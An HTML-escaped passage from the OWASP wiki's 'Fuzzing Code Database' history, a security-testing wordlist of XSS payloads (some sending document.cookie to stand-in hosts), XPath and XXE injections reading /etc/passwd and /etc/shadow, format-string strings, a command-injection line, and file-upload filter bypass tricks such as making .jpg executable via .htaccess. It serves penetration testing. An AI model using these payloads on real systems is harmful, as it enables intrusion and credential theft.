&amp;amp;lt;IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javasc&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav	ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;%20&amp;amp;amp;#14;%20javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20DYNSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20LOWSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.location='http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E&lt;br /&gt;
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//\;alert(String.fromCharCode(88,83,83))//&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;!--&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;=&amp;amp;amp;{}&lt;br /&gt;
'';!--&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
=== XML Attacks - (Update: 11 August 2009 - Total Statements: 15)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statements&lt;br /&gt;
count(/child::node())&lt;br /&gt;
x' or name()='username' or 'x'='y&lt;br /&gt;
&amp;amp;lt;name&amp;amp;gt;','')); phpinfo(); exit;/*&amp;amp;lt;/name&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;script&amp;amp;gt;var n=0;while(true){n++;}&amp;amp;lt;/script&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[' or 1=1 or ''=']]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file://c:/boot.ini&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/passwd&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/shadow&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////dev/random&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Format String Statements - (Update: xx/xx/xx - Total Statements: 28) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;%s%p%x%d&lt;br /&gt;
.1024d&lt;br /&gt;
%.2049d&lt;br /&gt;
%p%p%p%p&lt;br /&gt;
%x%x%x%x&lt;br /&gt;
%d%d%d%d&lt;br /&gt;
%s%s%s%s&lt;br /&gt;
%99999999999s&lt;br /&gt;
%08x&lt;br /&gt;
%%20d&lt;br /&gt;
%%20n&lt;br /&gt;
%%20x&lt;br /&gt;
%%20s&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
%p%p%p%p%p%p%p%p%p%p&lt;br /&gt;
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&lt;br /&gt;
f(x)=%s x 123&lt;br /&gt;
f(x)=%x x 255&lt;br /&gt;
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
XXXXX.%p&lt;br /&gt;
XXXXX`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`&lt;br /&gt;
`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`%n&lt;br /&gt;
%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
XXX0_%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
%.16705u%2\$hn&lt;br /&gt;
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|&lt;br /&gt;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id &amp;amp;gt; /tmp/file; exit;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
==== Project Contributor  ====&lt;br /&gt;
&lt;br /&gt;
Project Leader: [[:User:Wagner.elias|'''Wagner Elias''']] &lt;br /&gt;
&lt;br /&gt;
Reviewer: [[:User:eneves|'''Eduardo Neves''']] &lt;br /&gt;
&lt;br /&gt;
Contributor: [[:User:ulisses.castro|'''Ulisses Castro''']] &lt;br /&gt;
&lt;br /&gt;
==== Feedback and Participation  ====&lt;br /&gt;
&lt;br /&gt;
We hope you find the Fuzzing Code Database useful. Please contribute to the Project by volunteering for one of the tasks, sending your comments, questions, and suggestions to wagner.elias |at| owasp.org &lt;br /&gt;
&lt;br /&gt;
==== Project Identification  ====&lt;br /&gt;
&lt;br /&gt;
{{Template:OWASP Project Identification Tab&lt;br /&gt;
| project_name = OWASP Fuzzing Code Database&lt;br /&gt;
| project_description = &lt;br /&gt;
| leader_name = Wagner Elias&lt;br /&gt;
| leader_email = &lt;br /&gt;
| leader_username = Wagner.elias&lt;br /&gt;
| maintainer_name = &lt;br /&gt;
| maintainer_email = &lt;br /&gt;
| maintainer_username = &lt;br /&gt;
| contributor_name1 = &lt;br /&gt;
| contributor_email1 = &lt;br /&gt;
| contributor_username1 = &lt;br /&gt;
| contributor_name2 = &lt;br /&gt;
| contributor_email2 = &lt;br /&gt;
| contributor_username2 = &lt;br /&gt;
| contributor_name3 = &lt;br /&gt;
| contributor_email3 = &lt;br /&gt;
| contributor_username3 = &lt;br /&gt;
| contributor_name4 = &lt;br /&gt;
| contributor_email4 = &lt;br /&gt;
| contributor_username4 = &lt;br /&gt;
| contributor_name5 = &lt;br /&gt;
| contributor_email5 = &lt;br /&gt;
| contributor_username5 = &lt;br /&gt;
| contributor_name6 = &lt;br /&gt;
| contributor_email6 = &lt;br /&gt;
| contributor_username6 = &lt;br /&gt;
| contributor_name7 = &lt;br /&gt;
| contributor_email7 = &lt;br /&gt;
| contributor_username7 = &lt;br /&gt;
| contributor_name8 = &lt;br /&gt;
| contributor_email8 = &lt;br /&gt;
| contributor_username8 = &lt;br /&gt;
| contributor_name9 = &lt;br /&gt;
| contributor_email9 = &lt;br /&gt;
| contributor_username9 = &lt;br /&gt;
| contributor_name10 = &lt;br /&gt;
| contributor_email10 = &lt;br /&gt;
| contributor_username10 =  &lt;br /&gt;
| pamphlet_link = &lt;br /&gt;
| mailing_list_name = owasp-fuzzing-code-database&lt;br /&gt;
| links_url1 = &lt;br /&gt;
| links_name1 = &lt;br /&gt;
| links_url2 = &lt;br /&gt;
| links_name2 = &lt;br /&gt;
| links_url3 = &lt;br /&gt;
| links_name3 = &lt;br /&gt;
| links_url4 = &lt;br /&gt;
| links_name4 = &lt;br /&gt;
| links_url5 = &lt;br /&gt;
| links_name5 = &lt;br /&gt;
| links_url6 = &lt;br /&gt;
| links_name6 = &lt;br /&gt;
| links_url7 = &lt;br /&gt;
| links_name7 = &lt;br /&gt;
| links_url8 = &lt;br /&gt;
| links_name8 = &lt;br /&gt;
| links_url9 = &lt;br /&gt;
| links_name9 = &lt;br /&gt;
| links_url10 = &lt;br /&gt;
| links_name10 = &lt;br /&gt;
| project_road_map =&lt;br /&gt;
| project_health_status = &lt;br /&gt;
| current_release_name = &lt;br /&gt;
| current_release_date = &lt;br /&gt;
| current_release_download_link = &lt;br /&gt;
| current_release_rating = &lt;br /&gt;
| current_release_leader_name = &lt;br /&gt;
| current_release_leader_email = &lt;br /&gt;
| current_release_leader_username = &lt;br /&gt;
| last_reviewed_release_name = &lt;br /&gt;
| last_reviewed_release_date = &lt;br /&gt;
| last_reviewed_release_download_link = &lt;br /&gt;
| last_reviewed_release_rating = &lt;br /&gt;
| last_reviewed_release_leader_name = &lt;br /&gt;
| last_reviewed_release_leader_email = &lt;br /&gt;
| last_reviewed_release_leader_username = &lt;br /&gt;
| old_release_name1 = &lt;br /&gt;
| old_release_date1 = &lt;br /&gt;
| old_release_download_link1 = &lt;br /&gt;
| old_release_name2 = &lt;br /&gt;
| old_release_date2 = &lt;br /&gt;
| old_release_download_link2 = &lt;br /&gt;
| old_release_name3 = &lt;br /&gt;
| old_release_date3 = &lt;br /&gt;
| old_release_download_link3 = &lt;br /&gt;
| old_release_name4 = &lt;br /&gt;
| old_release_date4 = &lt;br /&gt;
| old_release_download_link4 = &lt;br /&gt;
| old_release_name5 = &lt;br /&gt;
| old_release_date5 = &lt;br /&gt;
| old_release_download_link5 = &lt;br /&gt;
}} __NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP_Project|Fuzzing Code Database]] [[Category:OWASP_Document]] [[Category:OWASP_Alpha_Quality_Document]]&lt;/div&gt;</summary>
		<author><name>Adam.muntner</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=80071</id>
		<title>Category:OWASP Fuzzing Code Database</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=80071"/>
				<updated>2010-03-17T20:49:04Z</updated>
		
		<summary type="html">&lt;p&gt;Adam.muntner: /* (Common Data File Extensions  (Update: 16 March 2009 - Total Statements: 863) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This database is a collection of several statements used in code injection, fuzzing and brute-force aproach. All too often security professionals rely on their own repositories of statements collected from assessments they've conducted. These repositories are prone to being incomplete or outdated. We want to collect all these statements, merging the statements from several projects like [[WebScarab]], [[WebSlayer]] and [[JBroFuzz]] with member contributions to build a comprehensive dataset of effective statements to provide better testing results. Please add your own statements and check out the statements already added. &lt;br /&gt;
&lt;br /&gt;
==== News  ====&lt;br /&gt;
&lt;br /&gt;
'''02 February 2010'''' &lt;br /&gt;
&lt;br /&gt;
*Created new Category Lotus/Notes Files&lt;br /&gt;
&lt;br /&gt;
'''11 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Created new Category: XML Attacks&lt;br /&gt;
&lt;br /&gt;
''Update Statements'' &lt;br /&gt;
&lt;br /&gt;
*15 new XML Statements &lt;br /&gt;
*93 new SQL Injections Statements &lt;br /&gt;
*67 new Traversal Directory Statements &lt;br /&gt;
*Delete 33 XSS Statement Duplicate &lt;br /&gt;
*30 New XSS Statements&lt;br /&gt;
&lt;br /&gt;
'''7 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Updated the objectives of the project.&lt;br /&gt;
&lt;br /&gt;
'''21 July 2009''' &lt;br /&gt;
&lt;br /&gt;
*Set the team responsible for the project.&lt;br /&gt;
&lt;br /&gt;
==== Goals  ====&lt;br /&gt;
&lt;br /&gt;
This project intend to create a database that concentrate all tools which are based on wordlists such as Webscarab, JBroFuzz, Web Slayer , Dirbuster. and others. In addition to current tools developed by OWASP members we will create a database following a style similar to Open Vulnerability and Assessment Language (OVAL) where any tool can adopt and use a XML file maintained by OWASP. &lt;br /&gt;
&lt;br /&gt;
In addition, the following functionalities will be included on this project: &lt;br /&gt;
&lt;br /&gt;
1 - The statements of ASDR Project 2 - Browser 3 - Operational System 4 - Databases &lt;br /&gt;
&lt;br /&gt;
An URL will also be published to create an collaborative environment for the maintenance process where the following features are planned: &lt;br /&gt;
&lt;br /&gt;
1 - Deploy a process where a new statement can be suggested and registered if is not valid yet and not maintained in other database. &lt;br /&gt;
&lt;br /&gt;
2 - A list where besides the statement, a single id will be maintained to identify each statement with a description and the results of the exploitation. &lt;br /&gt;
&lt;br /&gt;
3 - Possibility to support users on the report of their own experiences with the statements. &lt;br /&gt;
&lt;br /&gt;
==== Statements  ====&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass   (Update: 17 March 2009 - notes ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# File Upload Fuzzfile - File Name Filter Bypass&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
# For MIME filter bypass, your shellscript should look like&lt;br /&gt;
# -------&lt;br /&gt;
# GIF89aP;&lt;br /&gt;
# [shell]&lt;br /&gt;
# -------&lt;br /&gt;
#&lt;br /&gt;
# For mod_cgi Server Side Include upload attacks&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;ls&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
#or, on Windows&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;dir&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
# Sometimes you can overwrite .htaccess in an upload folder on Apache httpd, try setting .jpg to executable. If you can set the target directory, try fuzz the list of all dirs you've enumberated on the servers, and try the commonly writable directory fuzzfile.&lt;br /&gt;
#&lt;br /&gt;
# example .htaccess that sets mime type .jpg to be executable:&lt;br /&gt;
# -----&lt;br /&gt;
# AddType application/x-httpd-php .jpg&lt;br /&gt;
# -----&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cross-Platform File Upload Filter Bypass - Filename Appends   (Update: 17 March 2009  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2009&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
%00index.html&lt;br /&gt;
;index.html&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cross-Platform File Upload Filter Bypass - Filename Appends   (Update: 17 March 2009  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2009 - notes&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# also: use &amp;quot;gim&amp;quot; to create a .jpg image with the meta comment field set to:&lt;br /&gt;
# -----&lt;br /&gt;
#&amp;lt;?php phpinfo(); ?&amp;gt; &lt;br /&gt;
#-----&lt;br /&gt;
&lt;br /&gt;
{PHPSCRIPT}&lt;br /&gt;
{PHPSCRIPT}.phtml&lt;br /&gt;
{PHPSCRIPT}.php.html&lt;br /&gt;
{PHPSCRIPT}.php::$DATA&lt;br /&gt;
{PHPSCRIPT}.php.php.rar &lt;br /&gt;
{PHPSCRIPT}.php.rar&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename &amp;lt;pre&amp;gt;Appends  (Update: 17 March 2009  ===&lt;br /&gt;
# Microsoft-Specific Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2009&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
{ASPSCRIPT}&lt;br /&gt;
{ASPSCRIPT};&lt;br /&gt;
{ASPSCRIPT};.jpg&lt;br /&gt;
{ASPSCRIPT};.pdf&lt;br /&gt;
{ASPSCRIPT};.html&lt;br /&gt;
{ASPSCRIPT};.htm&lt;br /&gt;
{ASPSCRIPT};.txt&lt;br /&gt;
{ASPSCRIPT};.xyz&lt;br /&gt;
{ASPSCRIPT};.zip&lt;br /&gt;
{ASPSCRIPT};.tgz&lt;br /&gt;
{ASPSCRIPT};.doc&lt;br /&gt;
{ASPSCRIPT};.docx&lt;br /&gt;
{ASPSCRIPT};.xls&lt;br /&gt;
{ASPSCRIPT};.xlsx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Commonly Writable directories File Upload Filter Bypass - Filename  Appends  (&amp;lt;pre&amp;gt;Update: 17 March 2009  ===&lt;br /&gt;
#Commonly Writable directories File Upload Filter Bypass - Filename Appends  (Update: 17 March 2009 &lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
{HOST}/templates_compiled/&lt;br /&gt;
{HOST}/templates_c/&lt;br /&gt;
{HOST}/templates/&lt;br /&gt;
{HOST}/temporary/&lt;br /&gt;
{HOST}/images/&lt;br /&gt;
{HOST}/cache/&lt;br /&gt;
{HOST}/temp/&lt;br /&gt;
{HOST}/files/&lt;br /&gt;
{HOST}/tmp/&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Common Data File Extensions  (Update: 16 March 2009 - Total Statements: 863 ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 #Common Data File Extensions  (Update: 16 March 2009 - Total Statements: 863&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
.$er&lt;br /&gt;
.123&lt;br /&gt;
.1pe&lt;br /&gt;
.1ph&lt;br /&gt;
.3dr&lt;br /&gt;
.3dt&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.4dv&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.a3l&lt;br /&gt;
.a3m&lt;br /&gt;
.a3w&lt;br /&gt;
.a4l&lt;br /&gt;
.a4m&lt;br /&gt;
.a4w&lt;br /&gt;
.a5l&lt;br /&gt;
.a5w&lt;br /&gt;
.a65&lt;br /&gt;
.aao&lt;br /&gt;
.ab&lt;br /&gt;
.ab1&lt;br /&gt;
.ab2&lt;br /&gt;
.ab3&lt;br /&gt;
.abcd&lt;br /&gt;
.abi&lt;br /&gt;
.abp&lt;br /&gt;
.aby&lt;br /&gt;
.aca&lt;br /&gt;
.acc&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.ade&lt;br /&gt;
.adp&lt;br /&gt;
.adt&lt;br /&gt;
.adx&lt;br /&gt;
.aft&lt;br /&gt;
.agd&lt;br /&gt;
.aifb&lt;br /&gt;
.alc&lt;br /&gt;
.ald&lt;br /&gt;
.ali&lt;br /&gt;
.amb&lt;br /&gt;
.amsorm&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.apr&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ask&lt;br /&gt;
.asm&lt;br /&gt;
.ast&lt;br /&gt;
.at5&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.awg&lt;br /&gt;
.azw&lt;br /&gt;
.bafl&lt;br /&gt;
.bci&lt;br /&gt;
.bcm&lt;br /&gt;
.bdf&lt;br /&gt;
.bdic&lt;br /&gt;
.bfx&lt;br /&gt;
.bgl&lt;br /&gt;
.bgt&lt;br /&gt;
.bin&lt;br /&gt;
.bjo&lt;br /&gt;
.bk&lt;br /&gt;
.bkk&lt;br /&gt;
.blb&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.bok&lt;br /&gt;
.box&lt;br /&gt;
.brd&lt;br /&gt;
.brw&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btm&lt;br /&gt;
.btr&lt;br /&gt;
.cap&lt;br /&gt;
.cat&lt;br /&gt;
.cbg&lt;br /&gt;
.cch&lt;br /&gt;
.ccr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.cdx&lt;br /&gt;
.cel&lt;br /&gt;
.celtx&lt;br /&gt;
.chg&lt;br /&gt;
.chk&lt;br /&gt;
.chn&lt;br /&gt;
.ckd&lt;br /&gt;
.ckt&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.clp&lt;br /&gt;
.cmbl&lt;br /&gt;
.cna&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.crd&lt;br /&gt;
.crtx&lt;br /&gt;
.csa&lt;br /&gt;
.csv&lt;br /&gt;
.ctf&lt;br /&gt;
.ctt&lt;br /&gt;
.cursorfx&lt;br /&gt;
.curxptheme&lt;br /&gt;
.cvd&lt;br /&gt;
.cvn&lt;br /&gt;
.cwk&lt;br /&gt;
.cws&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.cyo&lt;br /&gt;
.cys&lt;br /&gt;
.daf&lt;br /&gt;
